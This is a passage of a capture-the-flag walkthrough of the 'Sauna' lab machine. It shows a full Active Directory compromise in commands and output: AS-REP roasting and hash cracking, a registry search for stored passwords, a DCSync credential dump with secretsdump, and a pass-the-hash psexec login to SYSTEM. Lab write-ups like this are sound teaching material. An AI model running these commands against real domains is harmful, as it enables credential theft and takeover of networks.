<p>base on the data I got, the machine is running on <code>kerberos</code> and the domain name is <code>EGOTISTICALBANK</code></p>
<p>I listed all the <code>users</code> that on the <code>about-us</code> page in the website with different <code>name</code> variation :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">Fergus.Smith</span><br><span class="line">Fergus.a.Smith</span><br><span class="line">FSmith</span><br><span class="line">fsmith</span><br><span class="line">FaSmith</span><br><span class="line">FeSmith</span><br><span class="line">FeaSmith</span><br><span class="line">Hugo.Bear</span><br><span class="line">Hugo.a.Bear</span><br><span class="line">HBear</span><br><span class="line">HaBear</span><br><span class="line">HuBear</span><br><span class="line">HuaBear</span><br><span class="line">Steven.Kerb</span><br><span class="line">Steven.a.Kerb</span><br><span class="line">SKerb</span><br><span class="line">SaKerb</span><br><span class="line">StKerb</span><br><span class="line">StaKerb</span><br><span class="line">Shaun.Coins</span><br><span class="line">Shaun.a.Coins</span><br><span class="line">SCoins</span><br><span class="line">SaCoins</span><br><span class="line">ShCoins</span><br><span class="line">ShaCoins</span><br><span class="line">Bowie.Taylor</span><br><span class="line">Bowie.a.Taylor</span><br><span class="line">BTaylor</span><br><span class="line">BaTaylor</span><br><span class="line">BoTaylor</span><br><span class="line">BoaTaylor</span><br><span class="line">Sophie.Driver</span><br><span class="line">Sophie.a.Driver</span><br><span class="line">SDriver</span><br><span class="line">SaDriver</span><br><span class="line">SoDriver</span><br><span class="line">SoaDriver</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Kerberos-Pre-Authentication"><a href="#Kerberos-Pre-Authentication" class="headerlink" title="Kerberos Pre-Authentication"></a>Kerberos Pre-Authentication</h3><p>Now that I have <code>users list</code> my next thing to do is to check if the <code>Kerberos pre-authentication required</code> is not set, and do the <code>asreproast</code> attack</p>
<p>I will grab the <code>AS_REP</code> with <code>GetNpUser.py</code> :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 </span><br><span class="line">❯ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile result.txt -dc-ip 10.10.10.175</span><br><span class="line">Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation</span><br><span class="line"></span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line">[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found <span class="keyword">in</span> Kerberos database)</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 took 24s </span><br><span class="line">❯ ls</span><br><span class="line">GetNPUsers.py nmap-Sauna  payaso.py  result.txt  sauna-directories  users.txt</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Now looking at the <code>result</code> I found that user <code>FSmit</code> is vulnerable to <code>ASREProast</code> and I get his password hash :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 </span><br><span class="line">❯ cat result.txt </span><br><span class="line">$krb5asrep$23<span class="variable">$FSmith</span>@EGOTISTICAL-BANK.LOCAL:8495bdf34711fd79334bb5c80d64fb42<span class="variable">$8f7bb2cbd1b7d6010e44b7bd27aa1779beb2bddaffcbbcb395cf8d63b3d94e73028f1f99337ee7279c1feb3f3d89ab816db9be7f60ea7b7c3dd9cd1d71bde16939feb9bd17c72b338abcacf74757de1eb64c042d7d935e3b58244c5e2b916c82e524fb978146a6f6d8a6500125eff93a540568a0d14a70fb0af654820c6ba6819c805637928dfca73778281b012c94ac5dc0efce1b917d4cd9f2dfc2d5997d56e969f7eb44e48fcca182976dfca86784c7a655a847b53cd5d7053c1db06424c2bc2fb3c8c4ebcd012baa2b0e32c5a2a31436d960f390af34db74148a9e40f8dae3ae2be7c98ad547b8403756e61827ba7b98c9fa8c521f4ae50b053da135bcc8</span></span><br><span class="line">$krb5asrep$23<span class="variable">$fsmith</span>@EGOTISTICAL-BANK.LOCAL:fa1c6693421661b8cf10a966cf45ff47<span class="variable">$7e2d1bbe52f0798842ecb2a2ed2c0c66d00c3202b79ae4982d860a6d3d00e35cd2fd2ef80c4c9172f494d0978f9d67361e37755a7e762a29b4b7f31165059b360c6b55db0a82ea7ee34ab193a2de0b08a18b77a51d446af15bfbead9ea25c9f291bf347bb0db34279a795615967fa79a2d74e5593f0c6ee4eaa27cc0b7736d15ec7ba61461645f666329e4bf01364d1966a7ff8b941b781bf4d40c0cee65187e2efd54ce99543029459a6587d091c160f06a7e95459b4f59687ef96959ae2d27f7181683bbf1b52fb329c7267d8cc198e5bca02c7ea8171b11e71fec9d85996e4bd5118e0e76ebe61823941c29dc75b3d03da0352b5bd68dc00b0e40b43ee0d7</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 </span><br><span class="line">❯ </span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Now that I have the hash it’s time to crack it with <code>john</code></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 </span><br><span class="line">❯ john result.txt --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">Thestrokes23     ($krb5asrep$23<span class="variable">$fsmith</span>@EGOTISTICAL-BANK.LOCAL)</span><br><span class="line">Thestrokes23     ($krb5asrep$23<span class="variable">$FSmith</span>@EGOTISTICAL-BANK.LOCAL)</span><br><span class="line">2g 0:00:00:58 DONE (2020-03-21 08:43) 0.03437g/s 181144p/s 362289c/s 362289C/s Thrall..Thehunter22</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sauna via 🐍 v2.7.17 took 59s </span><br><span class="line">❯ </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Grab-user-txt"><a href="#Grab-user-txt" class="headerlink" title="Grab user.txt"></a>Grab user.txt</h3><p>I got the user password <code>Thestrokes23</code> now it’s time use <code>evil-winrm</code> and login as <code>FSmith</code> and grab the <code>user.txt</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> evil-winrm <span class="keyword">on</span>  master via 💎 v2<span class="number">.5</span><span class="number">.7</span> </span><br><span class="line">❯ ruby evil-winrm.rb -i <span class="number">10.10</span><span class="number">.10</span><span class="number">.175</span> -u FSmith -p Thestrokes23</span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v2<span class="number">.3</span></span><br><span class="line"></span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Documents&gt; whoami</span><br><span class="line">egotisticalbank\fsmith</span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Documents&gt; cd ..</span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith&gt; cd Desktop</span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Desktop&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\FSmith\Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">-a----        <span class="number">1</span>/<span class="number">23</span>/<span class="number">2020</span>  <span class="number">10</span>:<span class="number">03</span> AM             <span class="number">34</span> user.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Desktop&gt; more user.txt</span><br><span class="line"><span class="number">20b</span>98d97</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Desktop&gt; </span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><h3 id="Escalating-to-svc-loanmgr"><a href="#Escalating-to-svc-loanmgr" class="headerlink" title="Escalating to svc_loanmgr"></a>Escalating to svc_loanmgr</h3><p>upon enumerating the box there’s another user <code>svc_loanmgr</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\users&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\users</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">d-----        <span class="number">1</span>/<span class="number">25</span>/<span class="number">2020</span>   <span class="number">1</span>:<span class="number">05</span> PM                Administrator</span><br><span class="line">d-----        <span class="number">1</span>/<span class="number">23</span>/<span class="number">2020</span>   <span class="number">9</span>:<span class="number">52</span> AM                FSmith</span><br><span class="line">d-r---        <span class="number">1</span>/<span class="number">22</span>/<span class="number">2020</span>   <span class="number">9</span>:<span class="number">32</span> PM                Public</span><br><span class="line">d-----        <span class="number">1</span>/<span class="number">24</span>/<span class="number">2020</span>   <span class="number">4</span>:<span class="number">05</span> PM                svc_loanmgr</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>I need to get the user <code>svc_loanmgr</code> but I don’t know what to do next so I decided to run <code>WinPEAS</code>. After running I got his AutoLogon credentials in plain text :</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line">	</span><br><span class="line">  [<span class="meta">+</span>] <span class="function">Looking <span class="keyword">for</span> AutoLogon <span class="title">credentials</span>(<span class="params">T1012</span>)</span></span><br><span class="line"><span class="function">Some AutoLogon credentials were found!!</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">	DefaultDomainName				: EGOTISTICALBANK</span></span><br><span class="line"><span class="function">	DefaultUserName					: EGOTISTICALBANK\svc_loanmanager</span></span><br><span class="line"><span class="function">	DefaultPassword					: Moneymakestheworldgoround!</span></span><br><span class="line"><span class="function"></span></span><br></pre></td></tr></table></figure>

<p>so the password is <code>Moneymakestheworldgoround!</code></p>
<p>We can also get his password with this command <code>reg query HKLM /f password /t REG_SZ /s</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\FSmith\Desktop&gt; reg query HKLM /f password /t REG_SZ /s</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\&#123;<span class="number">29</span>EA1611<span class="number">-529B</span><span class="number">-4113</span><span class="number">-8</span>EE3-EE0F6DD2C715&#125;</span><br><span class="line">    (Default)    REG_SZ    RASGCW Change Password Page</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\&#123;<span class="number">3b</span>fe6eb7<span class="number">-281</span>d<span class="number">-4333</span><span class="number">-999</span>e-e949e3621de7&#125;</span><br><span class="line">    (Default)    REG_SZ    Cert Password UI Page</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\&#123;<span class="number">9</span>cb233a5-a4a5<span class="number">-46b</span>9-ab13-db07ce949410&#125;</span><br><span class="line">    (Default)    REG_SZ    Password retry UI Page</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\&#123;d9162b5b-ca81<span class="number">-476</span>e-a310-cb32d932733c&#125;</span><br><span class="line">    (Default)    REG_SZ    Password Expired UI Page</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</span><br><span class="line">    DefaultPassword    REG_SZ    Moneymakestheworldgoround!</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest</span><br><span class="line">    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\&#123;<span class="number">2135f</span>72a<span class="number">-90b</span>5<span class="number">-4</span>ed3-a7f1<span class="number">-8b</span>b705ac276a&#125;</span><br><span class="line">    (Default)    REG_SZ    PicturePasswordLogonProvider</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\&#123;<span class="number">60b</span>78e88-ead8<span class="number">-445</span>c<span class="number">-9</span>cfd<span class="number">-0b</span>87f74ea6cd&#125;</span><br><span class="line">    (Default)    REG_SZ    PasswordProvider</span><br><span class="line"></span><br><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK</span><br><span class="line">    Text    REG_SZ    Prompt <span class="keyword">for</span> user name <span class="keyword">and</span> password</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Login-as-svc-loanmanager"><a href="#Login-as-svc-loanmanager" class="headerlink" title="Login as svc_loanmanager"></a>Login as svc_loanmanager</h3><p>So from user <code>FSmith</code> now I will logged in as <code>svc_loanmanager</code> and start enumerating again.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop&amp;gt; whoami /all</span><br><span class="line"></span><br><span class="line">USER INFORMATION</span><br><span class="line">----------------</span><br><span class="line"></span><br><span class="line">User Name                   SID</span><br><span class="line">=========================== ==============================================</span><br><span class="line">egotisticalbank\svc_loanmgr S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-2966785786</span><span class="number">-3096785034</span><span class="number">-1186376766</span><span class="number">-1108</span></span><br><span class="line"></span><br><span class="line">GROUP INFORMATION</span><br><span class="line">-----------------</span><br><span class="line"></span><br><span class="line">Group Name                                  Type             SID          Attributes</span><br><span class="line">=========================================== ================ ============ ==================================================</span><br><span class="line">Everyone                                    Well-known <span class="keyword">group</span> S<span class="number">-1</span><span class="number">-1</span><span class="number">-0</span>      Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">BUILTIN\Remote Management Users             Alias            S<span class="number">-1</span><span class="number">-5</span><span class="number">-32</span><span class="number">-580</span> Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">BUILTIN\Users                               Alias            S<span class="number">-1</span><span class="number">-5</span><span class="number">-32</span><span class="number">-545</span> Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">BUILTIN\Pre-Windows <span class="number">2000</span> Compatible Access  Alias            S<span class="number">-1</span><span class="number">-5</span><span class="number">-32</span><span class="number">-554</span> Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">NT AUTHORITY\NETWORK                        Well-known <span class="keyword">group</span> S<span class="number">-1</span><span class="number">-5</span><span class="number">-2</span>      Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">NT AUTHORITY\Authenticated Users            Well-known <span class="keyword">group</span> S<span class="number">-1</span><span class="number">-5</span><span class="number">-11</span>     Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">NT AUTHORITY\This Organization              Well-known <span class="keyword">group</span> S<span class="number">-1</span><span class="number">-5</span><span class="number">-15</span>     Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">NT AUTHORITY\NTLM Authentication            Well-known <span class="keyword">group</span> S<span class="number">-1</span><span class="number">-5</span><span class="number">-64</span><span class="number">-10</span>  Mandatory <span class="keyword">group</span>, Enabled <span class="keyword">by</span> <span class="literal">default</span>, Enabled <span class="keyword">group</span></span><br><span class="line">Mandatory Label\Medium Plus Mandatory Level Label            S<span class="number">-1</span><span class="number">-16</span><span class="number">-8448</span></span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name                Description                    State</span><br><span class="line">============================= ============================== =======</span><br><span class="line">SeMachineAccountPrivilege     Add workstations to domain     Enabled</span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking       Enabled</span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working <span class="keyword">set</span> Enabled</span><br><span class="line"></span><br><span class="line">USER CLAIMS INFORMATION</span><br><span class="line">-----------------------</span><br><span class="line"></span><br><span class="line">User claims unknown.</span><br><span class="line"></span><br><span class="line">Kerberos support <span class="keyword">for</span> Dynamic Access Control <span class="keyword">on</span> <span class="keyword">this</span> device has been disabled.</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_loanmgr&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>No interesting stuffs found. I decided to use <a target="_blank" rel="noopener" href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a> to get the structure of all domains :</p>
<p><img src="/img/sauna/sauna-dcsync.png" alt="HackTheBox-Book" title="sauna-dcsync"></p>
<p>I just found that user <code>svc_loanmgr</code> has permissions to execute DCSync against the DC</p>
<p>So I can abuse this privileges using <code>secretdumps</code> and extract the hash of the Administrator password :</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> impacket/examples <span class="keyword">on</span>  master via 🐍 v2<span class="number">.7</span><span class="number">.17</span> </span><br><span class="line">❯ python secretsdump.py EGOTISTICALBANK/svc_loanmgr@<span class="number">10.10</span><span class="number">.10</span><span class="number">.175</span> -just-dc</span><br><span class="line">Impacket v0<span class="number">.9</span><span class="number">.21</span>.dev1+<span class="number">20200305.180336</span>.e0c1b9dd - Copyright <span class="number">2020</span> SecureAuth Corporation</span><br><span class="line"></span><br><span class="line">Password:</span><br><span class="line">[<span class="meta">*</span>] <span class="function">Dumping Domain <span class="title">Credentials</span> (<span class="params">domain\uid:rid:lmhash:nthash</span>)</span></span><br><span class="line"><span class="function">[*] Using the DRSUAPI method to <span class="keyword">get</span> NTDS.DIT secrets</span></span><br><span class="line"><span class="function">Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::</span></span><br><span class="line"><span class="function">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></span><br><span class="line"><span class="function">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::</span></span><br><span class="line"><span class="function">SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::</span></span><br><span class="line"><span class="function">[*] Kerberos keys grabbed</span></span><br><span class="line"><span class="function">Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031</span></span><br><span class="line"><span class="function">Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0</span></span><br><span class="line"><span class="function">Administrator:des-cbc-md5:19d5f15d689b1ce5</span></span><br><span class="line"><span class="function">krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24</span></span><br><span class="line"><span class="function">krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9</span></span><br><span class="line"><span class="function">krbtgt:des-cbc-md5:c170d5dc3edfc1d9</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c</span></span><br><span class="line"><span class="function">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2</span></span><br><span class="line"><span class="function">SAUNA$:aes256-cts-hmac-sha1-96:c9d865558b9ce09f6589ed79a4f9354c128b168f5b1dfa5712cce47a741e7df2</span></span><br><span class="line"><span class="function">SAUNA$:aes128-cts-hmac-sha1-96:72c6fee92ba584acb19a4a1d7d2e876c</span></span><br><span class="line"><span class="function">SAUNA$:des-cbc-md5:da0794d52c5eab5e</span></span><br><span class="line"><span class="function">[*] Cleaning up... </span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">root <span class="keyword">in</span> impacket/examples <span class="keyword">on</span>  master via 🐍 v2.7.17 took 51s </span></span><br><span class="line"><span class="function">❯ </span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span></span><br></pre></td></tr></table></figure>

<p>Now that I got the administrator password hash, we can use <code>psexec</code> to login as administrator :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">root <span class="keyword">in</span> impacket/examples on  master via 🐍 v2.7.17 </span><br><span class="line">❯ python psexec.py EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -target-ip 10.10.10.175</span><br><span class="line">Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation</span><br><span class="line"></span><br><span class="line">[*] Requesting shares on 10.10.10.175.....</span><br><span class="line">[*] Found writable share ADMIN$</span><br><span class="line">[*] Uploading file GWcAFdKS.exe</span><br><span class="line">[*] Opening SVCManager on 10.10.10.175.....</span><br><span class="line">[*] Creating service iwyN on 10.10.10.175.....</span><br><span class="line">[*] Starting service iwyN.....</span><br><span class="line">[!] Press <span class="built_in">help</span> <span class="keyword">for</span> extra shell commands</span><br><span class="line">Microsoft Windows [Version 10.0.17763.973]</span><br><span class="line">(c) 2018 Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;whoami &amp; hostname</span><br><span class="line">nt authority\system</span><br><span class="line">SAUNA</span><br><span class="line"></span><br><span 